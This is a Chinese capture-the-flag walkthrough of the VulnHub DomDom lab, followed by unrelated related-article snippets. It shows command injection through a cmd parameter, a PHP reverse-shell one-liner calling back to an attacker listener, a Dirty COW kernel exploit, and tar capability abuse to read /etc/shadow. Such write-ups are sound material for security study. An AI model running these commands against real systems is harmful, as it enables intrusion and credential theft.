dom靶场

靶场下载地址:

https://www.vulnhub.com/entry/domdom-1,328/

一、信息收集

获取主机ip

nmap -sP 192.168.16.0/24netdiscover  -r 192.168.16.0/24

image-20230816105356176

端口版本获取

 nmap -sV -sC -A  -p 1-65535 192.168.16.209

开放端口只有80

image-20230816105831626

目录扫描

这里扫描php后缀的文件

gobuster  dir -u http://192.168.16.209    -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php

image-20230816110018723

这里扫描出两个目录一个/index.php,一个 /admin.php.

二、RCE漏洞利用

查看登录的网站

image-20230816110415566

image-20230816110432120

抓包

使用burpsuite抓取登录后的包

image-20230816110607584

把index.php更改为admin.php,发现存在cmd执行

image-20230816110701641

参数更改:

name=ad&username=ad&password=ad&access=access&cmd=ls

命令被成功执行

image-20230816110812243

nc反弹

1.开启监听

nc -lvnp 9002

2.反弹shell

这里使用python的shell

php -r '$sock=fsockopen("192.168.16.180",9002);exec("/bin/sh -i <&3 >&3 2>&3");'

进行加密后执行

image-20230816111100451

会话获取成功

image-20230816111137542

切换bash

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20230816111227762

这里推荐一个

https://www.revshells.com/ 网站生成反弹shell网站

三、方法一、脏牛提权

获取版本

uname -a

得到系统版本为Linux ubuntu 4.4.0-21-generic

漏洞检测

漏洞检测脚本进行检测 https://github.com/mzet-/linux-exploit-suggester

下载到kali

使用

python -m http.server

或者直接

wget https://github.com/The-Z-Labs/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh   

image-20230816112009911

添加上执行权限

chomd +x  linux-exploit-suggester.sh

执行

image-20230816112617090

脏牛漏洞利用

exp下载:wget https://www.exploit-db.com/download/40616

编译:这里编译会报错,不用管

gcc exp.c -o exp -pthread

添加执行权限

chmod +x  exp

运行,提权成功

image-20230816113010378

四、方法二、密码登陆提权

Linux系统利用可执行文件的Capabilities实现权限提升 - FreeBuf网络安全行业门户

Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组

“Capabilities”(能力机制)是一种计算机安全模型,用于限制一个进程或用户在操作系统中能够执行的特定操作。它基于原则,即每个主体(进程或用户)只被授予执行特定操作所需的最低权限。

1.现在假设管理员对一些可执行文件设置了capabilities。测试人员通过下面的命令查找这些文件:

getcap -r / 2>/dev/null

image-20230816144230109

2.Linux内核中Capabilities的实现机制对比

linux Capabilities简介–#setcap cap_net_raw,cap_net_admin=eip /a.out | (moonsec.com)

这里tar命令,可以绕过文件的读权限检查以及目录的读/执行权限的检查。

/bin/tar = cap_dac_read_search+ep

利用此特性我们可以读取系统中的敏感信息。

tar cvf shadow.tar /etc/shadow  //创建压缩文件
tar -xvf shadow.tar  //解压缩
chmod +r shadow  //赋予读权限
cat shadow | grep root  //查看shadow文件的内容

image-20230816144650803

读取了/etc/shadow文件的内容

这里

tar -cvf domom.tar /home/domom
#打包home下的目录

解压

tar -xvf domom.tar

切换目录到桌面

ls 发现有个README.md,查看最后得到密码Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a

image-20230816145259481

登录成功

image-20230816145343667

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/70523.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

数据结构--最短路径 Dijkstra算法

数据结构–最短路径 Dijkstra算法 Dijkstra算法 计算 b e g i n 点到各个点的最短路 \color{red}计算\ begin\ 点到各个点的最短路 计算 begin 点到各个点的最短路 如果是无向图&#xff0c;可以先把无向图转化成有向图 我们需要2个数组 final[] &#xff08;标记各顶点是否已…

django——创建 Django 项目和 APP

2.创建 Django 项目和 APP 命令&#xff1a; 创建Django项目 django-admin startproject name 创建子应用 python manager.py startapp name 2.1 创建工程 在使用Flask框架时&#xff0c;项目工程目录的组织与创建是需要我们自己手动创建完成的。 在django中&#xff0c;…

【GitLab私有仓库】如何在Linux上用Gitlab搭建自己的私有库并配置cpolar内网穿透?

文章目录 前言1. 下载Gitlab2. 安装Gitlab3. 启动Gitlab4. 安装cpolar5. 创建隧道配置访问地址6. 固定GitLab访问地址6.1 保留二级子域名6.2 配置二级子域名 7. 测试访问二级子域名 前言 GitLab 是一个用于仓库管理系统的开源项目&#xff0c;使用Git作为代码管理工具&#xf…

探究主成分分析方法数学原理

目录 1、简介 2、实现原理 3、实现步骤 4、公式分析 5、实例分析 6、⭐协方差矩阵补充说明 7、LaTex文本 ⭐创作不易&#xff0c;您的一键三连&#xff0c;就是支持我写作的最大动力&#xff01;&#x1f979; 关于代码如何实现&#xff0c;请看这篇文章&#xff1a;[机器…

depcheck 检查依赖插件使用及报错

1.全局安装 npm i depcheck -g 2.使用depcheck 指令进行依赖检查 报错 &#xff1a; 无法加载 xxx\npm\depcheck.ps1&#xff0c;因为在此系统上禁止运行脚本。有关详细信息&#xff0c;请参阅 https:/go.microsoft.com/fwlink/?LinkID135170 中的 about_Execution_Policies。…

UWB现场安装通常涉及以下步骤

UWB现场安装通常涉及以下步骤&#xff1a; 1.确定区域需求&#xff1a;首先&#xff0c;确定需要进行UWB定位的区域和目标。这可能是一个室内环境、仓库、工厂或其他特定的工作场所。 2.设计系统布局&#xff1a;根据区域的特点和目标定位需求&#xff0c;设计系统的布局和基…

VMware虚拟安装Ubuntu,然后切换Ubuntu内核版本

无论你选择哪种方法&#xff0c;一旦进入 GRUB 引导菜单&#xff0c;你应该能够选择需要的内核版本并启动系统。 打开终端&#xff1a;你可以通过按下 Ctrl Alt T 快捷键来打开终端。 使用 sudo&#xff1a;切换内核需要管理员权限&#xff0c;因此你需要使用 sudo 命令。首…

[JavaWeb]【二】Vue Ajax Elemnet Vue路由打包部署

目录 一 什么是Vue 1.1 Vue快速入门 1.2 常用指令 1.2.1 v-bind && v-model 1.2.2 v-on 1.2.3 v-if && v-show 1.2.4 v-for 1.2.5 案例 1.3 生命周期 二 Ajax 2.1 Ajax介绍 2.2 同步与异步 2.3 原生Ajax&#xff08;繁琐&#xff0c;过时了&#xff09…

远程debug竟如此简单

一张图告诉你如何远程debug idea选择 remote 模式&#xff0c;host 填上 远程服务的ip&#xff0c;port 填上 debug 端口 红框 框起来的是 idea自动生成的 jvm启动参数&#xff0c;需要 启动的时候 在服务器环境变量加上。 比如&#xff0c;用命令行启动&#xff1a; java -…

常见的逻辑运算符

计算机组成原理常见的逻辑运算符及其真值规则 逻辑运算名称 符号 规则 与运算 同真则真&#xff0c;有假则假 或运算 有真则真&#xff0c;同假则假 非运算 非真为假&#xff0c;非假为真 异或逻辑 相同为假&#xff0c;不同为真 与非逻辑 将与运算…

【高危】 jeecg-boot/积木报表基于H2驱动的任意代码执行漏洞

漏洞描述 JeecgBoot 是一款开源的的低代码开发平台&#xff0c;积木报表是其中的低代码报表组件。 JeecgBoot 受影响版本中&#xff0c;由于 jeecg-boot/jmreport/testConnection Api 接口未进行身份验证&#xff0c;并且未对 dbUrl 参数进行限制&#xff0c;当应用端存在H2数…

BGP基础

BGP 一、BGP基础二、BGP的发展历史三、BGP在企业中的应用四、距离矢量型协议和路径矢量型协议五、BGP的特征六、BGP的对等关系七、BGP的数据包八、BGP的状态机九、BGP的工作过程十、BGP的路由黑洞十一、BGP的环路问题 EBGP水平分割IBGP水平分割 十二、BGP的基本配置 1、BGP的对…